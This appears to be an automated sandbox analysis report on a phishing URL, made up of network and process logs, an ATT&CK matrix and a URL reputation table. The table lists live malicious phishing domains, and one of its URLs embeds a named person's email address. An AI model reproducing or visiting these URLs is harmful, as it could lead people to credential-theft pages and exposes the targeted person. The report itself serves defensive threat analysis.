Source: chromecache_126.2.dr	String found in binary or memory: https://www.gstatic.c..?/recaptcha/releases/rKbTvxTxwcw5VqzrtN-ICwWt/recaptcha__.
Source: chromecache_121.2.dr	String found in binary or memory: https://www.gstatic.com/recaptcha/releases/rKbTvxTxwcw5VqzrtN-ICwWt/recaptcha__en.js

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 62974 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 62922 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62945 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62951 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62953
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62954
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62955
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62956
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62957
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62958
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62959
Source: unknown	Network traffic detected: HTTP traffic on port 62916 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 62968 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62950
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62951
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62952
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62956 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62911 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62966
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62967
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62968
Source: unknown	Network traffic detected: HTTP traffic on port 62963 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62969
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 62980 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62960
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62961
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62962
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62963
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62957 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62975
Source: unknown	Network traffic detected: HTTP traffic on port 62985 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62962 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62976
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62977
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62978
Source: unknown	Network traffic detected: HTTP traffic on port 62909 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62970
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62971
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62972
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62973
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62974
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 62923 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62987
Source: unknown	Network traffic detected: HTTP traffic on port 62940 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62917 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62934 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62980
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62981
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62982
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62983
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62984
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62985
Source: unknown	Network traffic detected: HTTP traffic on port 62949 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62926 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62917
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62918
Source: unknown	Network traffic detected: HTTP traffic on port 62955 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62978 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62919
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62911
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62912
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62914
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62915
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62916
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62973 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61007 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62921 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62928
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62929
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62920
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62921
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62922
Source: unknown	Network traffic detected: HTTP traffic on port 62984 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62923
Source: unknown	Network traffic detected: HTTP traffic on port 62915 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62924
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62925
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62926
Source: unknown	Network traffic detected: HTTP traffic on port 62932 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62927
Source: unknown	Network traffic detected: HTTP traffic on port 62967 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62972 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62931
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62932
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62933
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62934
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62935
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62936
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62937
Source: unknown	Network traffic detected: HTTP traffic on port 62933 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62938
Source: unknown	Network traffic detected: HTTP traffic on port 62966 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62930
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62927 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 62944 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62950 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62942
Source: unknown	Network traffic detected: HTTP traffic on port 62961 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62943
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62944
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62945
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62946
Source: unknown	Network traffic detected: HTTP traffic on port 62938 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62947
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62949
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62940
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62941
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62983 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62960 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62931 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62919 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62925 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62977 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62936 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62942 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62943 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62920 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62976 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62937 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61007
Source: unknown	Network traffic detected: HTTP traffic on port 62914 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62971 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62954 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62909
Source: unknown	Network traffic detected: HTTP traffic on port 62959 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62982 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62970 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62912 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62958 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62935 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62941 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62987 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62952 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62946 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62929 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62924 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62947 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62953 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62918 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62981 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62975 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62930 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62969 -> 443

Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.43.61.160:443 -> 192.168.2.6:49729 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.43.61.160:443 -> 192.168.2.6:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:62938 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:62978 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:62980 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:62987 version: TLS 1.2

Source: classification engine

Classification label: mal80.phis.win@19/102@36/20

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2124 --field-trial-handle=2020,i,4672451666164520208,10170229004511272603,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.itanhangasaude.com.br/www/1475312998d8aKqdmPdPNJZi4JNq7WIowwvYGOvuIT___714820ufgtMx5cBwKyVuzlJn3VAYy1QdJUF0IuhCb1EFSueBwxxR9n7T4VNMSyrZd9kcF9rD67v2lJn3VufgtMP8xfiVl9n3IuhCbR9n7Tx5cBw4VNMSx5cBwi3vtsVl9n3MryfS1EFSuufgtMi3vts7O1AR408519___47741237d8aKqdmPdPNJZi4JNq7WIowwvYGOvuIT"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2124 --field-trial-handle=2020,i,4672451666164520208,10170229004511272603,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	Windows Management Instrumentation	1 Scripting	1 Process Injection	1 Process Injection	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Deobfuscate/Decode Files or Information	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	4 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	5 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	3 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
https://www.itanhangasaude.com.br/www/1475312998d8aKqdmPdPNJZi4JNq7WIowwvYGOvuIT___714820ufgtMx5cBwKyVuzlJn3VAYy1QdJUF0IuhCb1EFSueBwxxR9n7T4VNMSyrZd9kcF9rD67v2lJn3VufgtMP8xfiVl9n3IuhCbR9n7Tx5cBw4VNMSx5cBwi3vtsVl9n3MryfS1EFSuufgtMi3vts7O1AR408519___47741237d8aKqdmPdPNJZi4JNq7WIowwvYGOvuIT	0%	Avira URL Cloud	safe
https://www.itanhangasaude.com.br/www/1475312998d8aKqdmPdPNJZi4JNq7WIowwvYGOvuIT___714820ufgtMx5cBwKyVuzlJn3VAYy1QdJUF0IuhCb1EFSueBwxxR9n7T4VNMSyrZd9kcF9rD67v2lJn3VufgtMP8xfiVl9n3IuhCbR9n7Tx5cBw4VNMSx5cBwi3vtsVl9n3MryfS1EFSuufgtMi3vts7O1AR408519___47741237d8aKqdmPdPNJZi4JNq7WIowwvYGOvuIT	0%	Virustotal		Browse

Source	Detection	Scanner	Label	Link
https://code.jquery.com/jquery-3.6.0.min.js	0%	URL Reputation	safe
https://developers.google.com/recaptcha/docs/faq#localhost_support	0%	URL Reputation	safe
https://support.google.com/recaptcha#6262736	0%	URL Reputation	safe
https://support.google.com/recaptcha/?hl=en#6223828	0%	URL Reputation	safe
https://support.google.com/recaptcha/#6175971	0%	URL Reputation	safe
https://www.gstatic.c..?/recaptcha/releases/rKbTvxTxwcw5VqzrtN-ICwWt/recaptcha__.	0%	URL Reputation	safe
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D	0%	URL Reputation	safe
https://support.google.com/recaptcha	0%	URL Reputation	safe
https://recaptcha.net	0%	URL Reputation	safe
https://www.apache.org/licenses/	0%	URL Reputation	safe
https://developers.google.com/recaptcha/docs/faq#my-computer-or-network-may-be-sending-automated-que	0%	URL Reputation	safe
https://developers.google.com/recaptcha/docs/faq#are-there-any-qps-or-daily-limits-on-my-use-of-reca	0%	URL Reputation	safe
https://ok4static.oktacdn.com/fs/bcg/4/gfsh9pi7jcWKJKMAs1t7	0%	Avira URL Cloud	safe
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/89d53a759ec80cb4/1719992438382/SmI1HZgyGcJMdmX	0%	Avira URL Cloud	safe
https://vkwek.ckyucle.com/opQX1gSU09O17E3k10USpNWJby3griWtsKreijbClabV2GbvNaQkTef200	100%	Avira URL Cloud	malware
https://vkwek.ckyucle.com/12TvEGAMcd3aPS6720	100%	Avira URL Cloud	malware
https://vkwek.ckyucle.com/uvhQlfoMbJ4XJRFtu2qrnZlpt9TrWXuaMNtQnfO12130	100%	Avira URL Cloud	malware
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=89d53a759ec80cb4	0%	Avira URL Cloud	safe
https://vkwek.ckyucle.com/wxygRZbM3kOCvEcFjIDlEKamnOMWqU6ryQDaTnQ90180	100%	Avira URL Cloud	malware
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/pat/89d53a759ec80cb4/1719992438383/c2633130b86ac0ee267e83463b04f0536de9a1df4bb8645bb21edcc61940ee47/nDxduyEORWLmL4W	0%	Avira URL Cloud	safe
https://nzd92.6gniu68.ru/5575968202461485388865565DuGzcrTyOZLFNLDIYSVXZDPOLLDSEDNQMSF	100%	Avira URL Cloud	malware
https://cloud.google.com/contact	0%	Avira URL Cloud	safe
https://vkwek.ckyucle.com/2DUx/	100%	Avira URL Cloud	malware
https://ok4static.oktacdn.com/assets/loginpage/css/loginpage-theme.e0d37a504604ef874bad26435d62011f.css	0%	Avira URL Cloud	safe
https://a.nel.cloudflare.com/report/v4?s=9FyY8jlCi%2F4c38DrlGQVn%2B9cY2SnHA0qSQTJPRz%2F6kjxo3cIRyNG7O38Mbgk9DpOFhZ2EbmUVAyLtUU4H%2F83L1dONhtgfRMoHtDx%2B9CLOkABMcKzLgVVyQIFh0r8kA%3D%3D	0%	Avira URL Cloud	safe
https://cloud.google.com/contact	0%	Virustotal		Browse
https://github.com/fent)	0%	Avira URL Cloud	safe
https://vkwek.ckyucle.com/56NViOjdyBE66K4aemhQsnnijWU2q89KCdOOZ89106	100%	Avira URL Cloud	malware
https://s3irk.ativens.com/RYbeTFiWjDZgJJJpLPnlnELgJADpQWZTUKMIVRSXVMLEREXVNPFXMCCJOQKIVpq4KtkJY3tyzyxDzqeuv40	0%	Avira URL Cloud	safe
https://vkwek.ckyucle.com/favicon.ico	100%	Avira URL Cloud	malware
https://a.nel.cloudflare.com/report/v4?s=p5f604Do%2BEvEulOYwuBd%2FKN3A2hF8%2FZLsNfHkCqbNoMc3fA19tPlYJK%2B2VBDIjh93MJ2nOaHDSVdEhZGeODgv4NZd5UARcFXKsA1NW%2FTuIYY5HFztj6mYBlYH%2FCTmEeHtdMx4g%3D%3D	0%	Avira URL Cloud	safe
https://aadcdn.msauthimages.net/c1c6b6c8-d3sb-qm-hhdue0tq8clcu1b-m7tqgv0uyzh6-ekjzwq/logintenantbranding/0/illustration?ts=637292768768790391	0%	Avira URL Cloud	safe
https://www.google.com/recaptcha/api.js	0%	Avira URL Cloud	safe
https://vkwek.ckyucle.com/rfrj4D3IOrBb34OKfQNxY9akOmZckEWxXo9xwrWKJaQReBHFIHg5kn2	100%	Avira URL Cloud	malware
https://www.google.com/recaptcha/api2/	0%	Avira URL Cloud	safe
https://ipapi.co/8.46.123.33/json/	0%	Avira URL Cloud	safe
https://vkwek.ckyucle.com/2DUx/#-	100%	Avira URL Cloud	malware
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/flow/ov1/1057242924:1719990587:tl4agvakrAKEFCaNpdhyIRJf0e6GO8XVdySEz6sZojU/89d53a759ec80cb4/e7db8d6cd2b6574	0%	Avira URL Cloud	safe
https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js	0%	Avira URL Cloud	safe
https://www.google.com/recaptcha/api.js	0%	Virustotal		Browse
https://vkwek.ckyucle.com/78l8NmRVxJ45fjuJRst60	100%	Avira URL Cloud	malware
https://vkwek.ckyucle.com/45TplGCNDXCptZb896Wyz84jpQxy69	100%	Avira URL Cloud	malware
https://www.google.com/recaptcha/api2/	0%	Virustotal		Browse
https://a.nel.cloudflare.com/report/v4?s=ntbk1%2B0p%2FKPbnMlpunK%2FF02vxwHxUZE18hSmg6Vb0qrDO1qETED2rd35kRiENcKsGxXLOLDj2AImaw2XunnKdVpn9pEm0zkIHs2vWLzhjlhx9Uq7jOEqVhvsUixkPw%3D%3D	0%	Avira URL Cloud	safe
https://vkwek.ckyucle.com/ghUQ6Orlc7xuQgWcYlBAqViojmkfQHsxQ81JqDSmnddnAwJvMkE5kY34tjef210	100%	Avira URL Cloud	malware
https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js	0%	Virustotal		Browse
https://vkwek.ckyucle.com/90YOSnhY5T8JbcpfefM5jeqjHMc7G9ab72	100%	Avira URL Cloud	malware
https://ok4static.oktacdn.com/assets/js/sdk/okta-signin-widget/7.18.0/css/okta-sign-in.min.css	0%	Avira URL Cloud	safe
https://cloud.google.com/recaptcha-enterprise/billing-information	0%	Avira URL Cloud	safe
https://challenges.cloudflare.com/turnstile/v0/g/d2a97f6b6ec9/api.js	0%	Avira URL Cloud	safe
https://vkwek.ckyucle.com/qr6FfLhLZ5QwaGe5HJsDHUaandv4RUef6Ia8VBkiV1U467140	100%	Avira URL Cloud	malware
https://vkwek.ckyucle.com/mnV1lfGeFEBrSZF3tuYYejMClYOTm2XI5H6CdAfkleMiUWyqFdfMgv4x5mkyLwx220	100%	Avira URL Cloud	malware
https://vkwek.ckyucle.com/kldibCibzXsTOdNtNAZcyznJMPZFnrycjnb52eIM56170	100%	Avira URL Cloud	malware
https://httpbin.org/ip	0%	Avira URL Cloud	safe
https://vkwek.ckyucle.com/mnP7Z0RTacSIM9CxKvK5WayGyklgNKAsEypvOzHpfU2cP90150	100%	Avira URL Cloud	malware
https://challenges.cloudflare.com/turnstile/v0/g/d2a97f6b6ec9/api.js	0%	Virustotal		Browse
https://vkwek.ckyucle.com/yzBt71gp856BSdkJ4Qop47	100%	Avira URL Cloud	malware
https://play.google.com/log?format=json&hasfast=true	0%	Avira URL Cloud	safe
https://httpbin.org/ip	1%	Virustotal		Browse
https://cdn.socket.io/4.6.0/socket.io.min.js	0%	Avira URL Cloud	safe
https://vkwek.ckyucle.com/pqJEZxAGJZqUBhc85R9yzrCUwx40	100%	Avira URL Cloud	malware
https://vkwek.ckyucle.com/opyBbj15zt7RBaYZmgGW9bxLK2mu0meuvIDz6YOPBdPPv2mru5dCE8ifyMqnIcd240	100%	Avira URL Cloud	malware
https://vkwek.ckyucle.com/2DUx/?W-crystal.begin@schulergroup.com	100%	Avira URL Cloud	malware
https://cloud.google.com/recaptcha-enterprise/billing-information	0%	Virustotal		Browse
https://vkwek.ckyucle.com/ijGLf8KcAmo8F8uFMIwMKt5jWtydfJOdOqrh5153ZvUBo56RjXXwgHIOxu3KbwiSDyz230	100%	Avira URL Cloud	malware
https://vkwek.ckyucle.com/xy12R7tzrssHzef25	100%	Avira URL Cloud	malware
